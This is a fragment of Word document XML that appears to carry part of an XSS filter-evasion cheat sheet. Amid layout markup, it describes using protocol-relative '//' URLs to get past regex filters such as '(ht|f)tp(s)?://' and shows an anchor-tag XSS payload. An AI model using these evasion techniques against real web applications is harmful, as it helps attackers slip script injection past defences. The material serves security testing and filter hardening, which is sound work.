        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>saves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few</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6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bytes.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really</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>handy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6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space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issue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>too</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(two</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>less</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="6152"/>
        </w:tabs>
        <w:spacing w:before="75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82528" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>3956685</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>51435</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="848995" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="526" name="Group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8995" cy="116205"/>
                          <a:chOff x="6231" y="81"/>
                          <a:chExt cx="1337" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="527" name="Freeform 529"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="6231" y="81"/>
                            <a:ext cx="1337" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 7547 6231"/>
                              <a:gd name="T1" fmla="*/ T0 w 1337"/>
                              <a:gd name="T2" fmla="+- 0 263 81"/>
                              <a:gd name="T3" fmla="*/ 263 h 183"/>
                              <a:gd name="T4" fmla="+- 0 6252 6231"/>
                              <a:gd name="T5" fmla="*/ T4 w 1337"/>
                              <a:gd name="T6" fmla="+- 0 263 81"/>
                              <a:gd name="T7" fmla="*/ 263 h 183"/>
                              <a:gd name="T8" fmla="+- 0 6249 6231"/>
                              <a:gd name="T9" fmla="*/ T8 w 1337"/>
                              <a:gd name="T10" fmla="+- 0 263 81"/>
                              <a:gd name="T11" fmla="*/ 263 h 183"/>
                              <a:gd name="T12" fmla="+- 0 6231 6231"/>
                              <a:gd name="T13" fmla="*/ T12 w 1337"/>
                              <a:gd name="T14" fmla="+- 0 242 81"/>
                              <a:gd name="T15" fmla="*/ 242 h 183"/>
                              <a:gd name="T16" fmla="+- 0 6231 6231"/>
                              <a:gd name="T17" fmla="*/ T16 w 1337"/>
                              <a:gd name="T18" fmla="+- 0 239 81"/>
                              <a:gd name="T19" fmla="*/ 239 h 183"/>
                              <a:gd name="T20" fmla="+- 0 6231 6231"/>
                              <a:gd name="T21" fmla="*/ T20 w 1337"/>
                              <a:gd name="T22" fmla="+- 0 102 81"/>
                              <a:gd name="T23" fmla="*/ 102 h 183"/>
                              <a:gd name="T24" fmla="+- 0 6252 6231"/>
                              <a:gd name="T25" fmla="*/ T24 w 1337"/>
                              <a:gd name="T26" fmla="+- 0 81 81"/>
                              <a:gd name="T27" fmla="*/ 81 h 183"/>
                              <a:gd name="T28" fmla="+- 0 7547 6231"/>
                              <a:gd name="T29" fmla="*/ T28 w 1337"/>
                              <a:gd name="T30" fmla="+- 0 81 81"/>
                              <a:gd name="T31" fmla="*/ 81 h 183"/>
                              <a:gd name="T32" fmla="+- 0 7568 6231"/>
                              <a:gd name="T33" fmla="*/ T32 w 1337"/>
                              <a:gd name="T34" fmla="+- 0 102 81"/>
                              <a:gd name="T35" fmla="*/ 102 h 183"/>
                              <a:gd name="T36" fmla="+- 0 7568 6231"/>
                              <a:gd name="T37" fmla="*/ T36 w 1337"/>
                              <a:gd name="T38" fmla="+- 0 242 81"/>
                              <a:gd name="T39" fmla="*/ 242 h 183"/>
                              <a:gd name="T40" fmla="+- 0 7550 6231"/>
                              <a:gd name="T41" fmla="*/ T40 w 1337"/>
                              <a:gd name="T42" fmla="+- 0 263 81"/>
                              <a:gd name="T43" fmla="*/ 263 h 183"/>
                              <a:gd name="T44" fmla="+- 0 7547 6231"/>
                              <a:gd name="T45" fmla="*/ T44 w 1337"/>
                              <a:gd name="T46" fmla="+- 0 263 81"/>
                              <a:gd name="T47" fmla="*/ 26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7" h="183">
                                <a:moveTo>
                                  <a:pt x="131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16" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1337" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1337" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1319" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="131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Text Box 528"/>
                        <wps:cNvSpPr txBox="1">
                          <a:spLocks noChangeArrowheads="1"/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="6231" y="81"/>
                            <a:ext cx="133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4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(ht|f)tp(s)?://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7" o:spid="_x0000_s1899" style="position:absolute;left:0;text-align:left;margin-left:311.55pt;margin-top:4.05pt;width:66.85pt;height:9.15pt;z-index:-17533952;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="6231,81" coordsize="133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">
                <v:shape id="Freeform 529" o:spid="_x0000_s1900" style="position:absolute;left:6231;top:81;width:1337;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="133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NIf8cA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE70L/w/IKvYhuFKohuoq1LRQ8SFMRvD2y&#10;r8nW7NuQ3Wrsr+8KgsdhZr5h5svO1uJErTeOFYyGCQjiwmnDpYLd1/sgBeEDssbaMSm4kIfl4qE3&#10;x0y7M3/SKQ+liBD2GSqoQmgyKX1RkUU/dA1x9L5dazFE2ZZSt3iOcFvLcZJMpEXDcaHChtYVFcf8&#10;1yp4O+x3I/Oz6ablOt+a9NL/e3klpZ4eu9UMRKAu3MO39odW8DyewvVMPAJy8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TSH/HAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRy&#10;cy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACMAwAAAAA=&#10;" path="m1316,182l21,182r-3,l,161r,-3l,21,21,,1316,r21,21l1337,161r-18,21l1316,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1316,263;21,263;18,263;0,242;0,239;0,102;21,81;1316,81;1337,102;1337,242;1319,263;1316,263" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 528" o:spid="_x0000_s1901" type="#_x0000_t202" style="position:absolute;left:6231;top:81;width:133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KtkM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mIzj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SrZDBAAAA3A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4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(ht|f)tp(s)?://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characters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go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long</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>way)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easily</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>bypass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>regex</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>like</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>(thanks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Ozh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part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one).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="2268"/>
        </w:tabs>
        <w:spacing w:before="76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83040" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>2190115</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>52070</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="154305" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="523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305" cy="116205"/>
                          <a:chOff x="3449" y="82"/>
                          <a:chExt cx="243" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="524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9" y="82"/>
                            <a:ext cx="24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5" name="Text Box 525"/>
                        <wps:cNvSpPr txBox="1">
                          <a:spLocks noChangeArrowheads="1"/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="3449" y="82"/>
                            <a:ext cx="24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3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//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4" o:spid="_x0000_s1902" style="position:absolute;left:0;text-align:left;margin-left:172.45pt;margin-top:4.1pt;width:12.15pt;height:9.15pt;z-index:-17533440;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="3449,82" coordsize="243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">
                <v:shape id="Picture 526" o:spid="_x0000_s1903" type="#_x0000_t75" style="position:absolute;left:3449;top:82;width:243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6h2PEAAAA3AAAAA8AAABkcnMvZG93bnJldi54bWxEj82KwkAQhO/CvsPQwt50Ylh/yDrKurDg&#10;QZBE995k2iSY6YmZ0cS3dwTBY1FdX3Ut172pxY1aV1lWMBlHIIhzqysuFBwPf6MFCOeRNdaWScGd&#10;HKxXH4MlJtp2nNIt84UIEHYJKii9bxIpXV6SQTe2DXHwTrY16INsC6lb7ALc1DKOopk0WHFoKLGh&#10;35Lyc3Y14Y2Lvv53nZxPUpueD7vNPosXUqnPYf/zDcJT79/Hr/RWK5jGX/AcEwggV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k6h2PEAAAA3AAAAA8AAAAAAAAAAAAAAAAA&#10;nwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPcAAACQAwAAAAA=&#10;">
                  <v:imagedata r:id="rId67" o:title=""/>
                </v:shape>
                <v:shape id="Text Box 525" o:spid="_x0000_s1904" type="#_x0000_t202" style="position:absolute;left:3449;top:82;width:243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MCDsUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE70L/w/IKvZlNBcWmbkRKCwVBjOmhx9fs&#10;M1mSfZtmtxr/vSsIPQ4z8w2zWo+2EycavHGs4DlJQRBXThuuFXyVH9MlCB+QNXaOScGFPKzzh8kK&#10;M+3OXNDpEGoRIewzVNCE0GdS+qohiz5xPXH0jm6wGKIcaqkHPEe47eQsTRfSouG40GBPbw1V7eHP&#10;Kth8c/Fufnc/++JYmLJ8SXm7aJV6ehw3ryACjeE/fG9/agXz2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kwIO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3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//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783552" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>2483485</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>52070</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="262890" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="522" name="Freeform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2890" cy="116205"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="T0" fmla="+- 0 4303 3911"/>
                            <a:gd name="T1" fmla="*/ T0 w 414"/>
                            <a:gd name="T2" fmla="+- 0 264 82"/>
                            <a:gd name="T3" fmla="*/ 264 h 183"/>
                            <a:gd name="T4" fmla="+- 0 3932 3911"/>
                            <a:gd name="T5" fmla="*/ T4 w 414"/>
                            <a:gd name="T6" fmla="+- 0 264 82"/>
                            <a:gd name="T7" fmla="*/ 264 h 183"/>
                            <a:gd name="T8" fmla="+- 0 3929 3911"/>
                            <a:gd name="T9" fmla="*/ T8 w 414"/>
                            <a:gd name="T10" fmla="+- 0 264 82"/>
                            <a:gd name="T11" fmla="*/ 264 h 183"/>
                            <a:gd name="T12" fmla="+- 0 3911 3911"/>
                            <a:gd name="T13" fmla="*/ T12 w 414"/>
                            <a:gd name="T14" fmla="+- 0 243 82"/>
                            <a:gd name="T15" fmla="*/ 243 h 183"/>
                            <a:gd name="T16" fmla="+- 0 3911 3911"/>
                            <a:gd name="T17" fmla="*/ T16 w 414"/>
                            <a:gd name="T18" fmla="+- 0 240 82"/>
                            <a:gd name="T19" fmla="*/ 240 h 183"/>
                            <a:gd name="T20" fmla="+- 0 3911 3911"/>
                            <a:gd name="T21" fmla="*/ T20 w 414"/>
                            <a:gd name="T22" fmla="+- 0 103 82"/>
                            <a:gd name="T23" fmla="*/ 103 h 183"/>
                            <a:gd name="T24" fmla="+- 0 3932 3911"/>
                            <a:gd name="T25" fmla="*/ T24 w 414"/>
                            <a:gd name="T26" fmla="+- 0 82 82"/>
                            <a:gd name="T27" fmla="*/ 82 h 183"/>
                            <a:gd name="T28" fmla="+- 0 4303 3911"/>
                            <a:gd name="T29" fmla="*/ T28 w 414"/>
                            <a:gd name="T30" fmla="+- 0 82 82"/>
                            <a:gd name="T31" fmla="*/ 82 h 183"/>
                            <a:gd name="T32" fmla="+- 0 4324 3911"/>
                            <a:gd name="T33" fmla="*/ T32 w 414"/>
                            <a:gd name="T34" fmla="+- 0 103 82"/>
                            <a:gd name="T35" fmla="*/ 103 h 183"/>
                            <a:gd name="T36" fmla="+- 0 4324 3911"/>
                            <a:gd name="T37" fmla="*/ T36 w 414"/>
                            <a:gd name="T38" fmla="+- 0 243 82"/>
                            <a:gd name="T39" fmla="*/ 243 h 183"/>
                            <a:gd name="T40" fmla="+- 0 4306 3911"/>
                            <a:gd name="T41" fmla="*/ T40 w 414"/>
                            <a:gd name="T42" fmla="+- 0 264 82"/>
                            <a:gd name="T43" fmla="*/ 264 h 183"/>
                            <a:gd name="T44" fmla="+- 0 4303 3911"/>
                            <a:gd name="T45" fmla="*/ T44 w 414"/>
                            <a:gd name="T46" fmla="+- 0 264 82"/>
                            <a:gd name="T47" fmla="*/ 264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414" h="183">
                              <a:moveTo>
                                <a:pt x="392" y="182"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="21" y="182"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="18" y="182"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="161"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="15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392" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="413" y="21"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="413" y="161"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="395" y="182"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="392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20DE9" id="Freeform 523" o:spid="_x0000_s1026" style="position:absolute;margin-left:195.55pt;margin-top:4.1pt;width:20.7pt;height:9.15pt;z-index:-1753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" path="m392,182r-371,l18,182,,161r,-3l,21,21,,392,r21,21l413,161r-18,21l392,182xe" fillcolor="#f5f5f5" stroked="f">
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="248920,167640;13335,167640;11430,167640;0,154305;0,152400;0,65405;13335,52070;248920,52070;262255,65405;262255,154305;250825,167640;248920,167640" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                <w10:wrap anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateConten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change</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console"/>
          <w:color w:val="36454E"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>\\\\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console"/>
          <w:color w:val="36454E"/>
          <w:spacing w:val="-53"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>.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keep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slashes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place,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>however,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>otherwise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</w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="63"/>
        <w:ind w:left="154"/>
      </w:pPr>
      <w:r>
        <w:t>interpreted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relative</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>path</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>URL.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="8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4195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160020</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1921510" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="519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1510" cy="116205"/>
                          <a:chOff x="1614" y="252"/>
                          <a:chExt cx="3026" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="520" name="Freeform 522"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="251"/>
                            <a:ext cx="3026" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 4619 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 3026"/>
                              <a:gd name="T2" fmla="+- 0 434 252"/>
                              <a:gd name="T3" fmla="*/ 434 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 3026"/>
                              <a:gd name="T6" fmla="+- 0 434 252"/>
                              <a:gd name="T7" fmla="*/ 434 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 3026"/>
                              <a:gd name="T10" fmla="+- 0 433 252"/>
                              <a:gd name="T11" fmla="*/ 433 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 3026"/>
                              <a:gd name="T14" fmla="+- 0 413 252"/>
                              <a:gd name="T15" fmla="*/ 413 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 3026"/>
                              <a:gd name="T18" fmla="+- 0 410 252"/>
                              <a:gd name="T19" fmla="*/ 410 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 3026"/>
                              <a:gd name="T22" fmla="+- 0 273 252"/>
                              <a:gd name="T23" fmla="*/ 273 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 3026"/>
                              <a:gd name="T26" fmla="+- 0 252 252"/>
                              <a:gd name="T27" fmla="*/ 252 h 183"/>
                              <a:gd name="T28" fmla="+- 0 4619 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 3026"/>
                              <a:gd name="T30" fmla="+- 0 252 252"/>
                              <a:gd name="T31" fmla="*/ 252 h 183"/>
                              <a:gd name="T32" fmla="+- 0 4640 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 3026"/>
                              <a:gd name="T34" fmla="+- 0 273 252"/>
                              <a:gd name="T35" fmla="*/ 273 h 183"/>
                              <a:gd name="T36" fmla="+- 0 4640 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 3026"/>
                              <a:gd name="T38" fmla="+- 0 413 252"/>
                              <a:gd name="T39" fmla="*/ 413 h 183"/>
                              <a:gd name="T40" fmla="+- 0 4622 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 3026"/>
                              <a:gd name="T42" fmla="+- 0 433 252"/>
                              <a:gd name="T43" fmla="*/ 433 h 183"/>
                              <a:gd name="T44" fmla="+- 0 4619 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 3026"/>
                              <a:gd name="T46" fmla="+- 0 434 252"/>
                              <a:gd name="T47" fmla="*/ 43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026" h="183">
                                <a:moveTo>
                                  <a:pt x="30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005" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3026" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3026" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3008" y="181"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="30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Text Box 521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1"/>
                            <a:ext cx="302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HREF="//</w:t>
                              </w:r>
                              <w:hyperlink r:id="rId68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www.google.com/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"&gt;XSS&lt;/A&gt;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0" o:spid="_x0000_s1905" style="position:absolute;margin-left:80.7pt;margin-top:12.6pt;width:151.3pt;height:9.15pt;z-index:-15574528;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,252" coordsize="302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">
                <v:shape id="Freeform 522" o:spid="_x0000_s1906" style="position:absolute;left:1614;top:251;width:3026;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="302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LI9cQA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPz2vCMBS+C/sfwhvsIjNVcRudUWRjEsXLqoN5ezRv&#10;bVnzUppY639vDoLHj+/3fNnbWnTU+sqxgvEoAUGcO1NxoeCw/3p+A+EDssHaMSm4kIfl4mEwx9S4&#10;M39Tl4VCxBD2KSooQ2hSKX1ekkU/cg1x5P5cazFE2BbStHiO4baWkyR5kRYrjg0lNvRRUv6fnayC&#10;4TToH/N51L92+Npvu7XeHHdaqafHfvUOIlAf7uKbWxsFs0mcH8/EI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yyPXEAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" path="m3005,182l21,182r-3,-1l,161r,-3l,21,21,,3005,r21,21l3026,161r-18,20l3005,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="3005,434;21,434;18,433;0,413;0,410;0,273;21,252;3005,252;3026,273;3026,413;3008,433;3005,434" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 521" o:spid="_x0000_s1907" type="#_x0000_t202" style="position:absolute;left:1614;top:251;width:302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ED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oBA3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6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HREF="//</w:t>
                        </w:r>
                        <w:hyperlink r:id="rId69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www.google.com/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"&gt;XSS&lt;/A&gt;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Balk4"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Google</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>"feeling lucky"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>part 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="1" w:line="333" w:lineRule="auto"/>
        <w:ind w:left="154" w:right="497"/>
        <w:jc w:val="both"/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784064" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>1688465</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>344170</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="471170" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="518" name="Freeform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1170" cy="116205"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="T0" fmla="+- 0 3379 2659"/>
                            <a:gd name="T1" fmla="*/ T0 w 742"/>
                            <a:gd name="T2" fmla="+- 0 724 542"/>
                            <a:gd name="T3" fmla="*/ 724 h 183"/>
                            <a:gd name="T4" fmla="+- 0 2680 2659"/>
                            <a:gd name="T5" fmla="*/ T4 w 742"/>
                            <a:gd name="T6" fmla="+- 0 724 542"/>
                            <a:gd name="T7" fmla="*/ 724 h 183"/>
                            <a:gd name="T8" fmla="+- 0 2677 2659"/>
                            <a:gd name="T9" fmla="*/ T8 w 742"/>
                            <a:gd name="T10" fmla="+- 0 723 542"/>
                            <a:gd name="T11" fmla="*/ 723 h 183"/>
                            <a:gd name="T12" fmla="+- 0 2659 2659"/>
                            <a:gd name="T13" fmla="*/ T12 w 742"/>
                            <a:gd name="T14" fmla="+- 0 703 542"/>
                            <a:gd name="T15" fmla="*/ 703 h 183"/>
                            <a:gd name="T16" fmla="+- 0 2659 2659"/>
                            <a:gd name="T17" fmla="*/ T16 w 742"/>
                            <a:gd name="T18" fmla="+- 0 700 542"/>
                            <a:gd name="T19" fmla="*/ 700 h 183"/>
                            <a:gd name="T20" fmla="+- 0 2659 2659"/>
                            <a:gd name="T21" fmla="*/ T20 w 742"/>
                            <a:gd name="T22" fmla="+- 0 563 542"/>
                            <a:gd name="T23" fmla="*/ 563 h 183"/>
                            <a:gd name="T24" fmla="+- 0 2680 2659"/>
                            <a:gd name="T25" fmla="*/ T24 w 742"/>
                            <a:gd name="T26" fmla="+- 0 542 542"/>
                            <a:gd name="T27" fmla="*/ 542 h 183"/>
                            <a:gd name="T28" fmla="+- 0 3379 2659"/>
                            <a:gd name="T29" fmla="*/ T28 w 742"/>
                            <a:gd name="T30" fmla="+- 0 542 542"/>
                            <a:gd name="T31" fmla="*/ 542 h 183"/>
                            <a:gd name="T32" fmla="+- 0 3400 2659"/>
                            <a:gd name="T33" fmla="*/ T32 w 742"/>
                            <a:gd name="T34" fmla="+- 0 563 542"/>
                            <a:gd name="T35" fmla="*/ 563 h 183"/>
                            <a:gd name="T36" fmla="+- 0 3400 2659"/>
                            <a:gd name="T37" fmla="*/ T36 w 742"/>
                            <a:gd name="T38" fmla="+- 0 703 542"/>
                            <a:gd name="T39" fmla="*/ 703 h 183"/>
                            <a:gd name="T40" fmla="+- 0 3382 2659"/>
                            <a:gd name="T41" fmla="*/ T40 w 742"/>
                            <a:gd name="T42" fmla="+- 0 723 542"/>
                            <a:gd name="T43" fmla="*/ 723 h 183"/>
                            <a:gd name="T44" fmla="+- 0 3379 2659"/>
                            <a:gd name="T45" fmla="*/ T44 w 742"/>
                            <a:gd name="T46" fmla="+- 0 724 542"/>
                            <a:gd name="T47" fmla="*/ 724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742" h="183">
                              <a:moveTo>
                                <a:pt x="720" y="182"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="21" y="182"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="18" y="181"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="161"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="15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720" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="741" y="21"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="741" y="161"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="723" y="181"/>
                              </a:lnTo>
                              <a:lnTo>
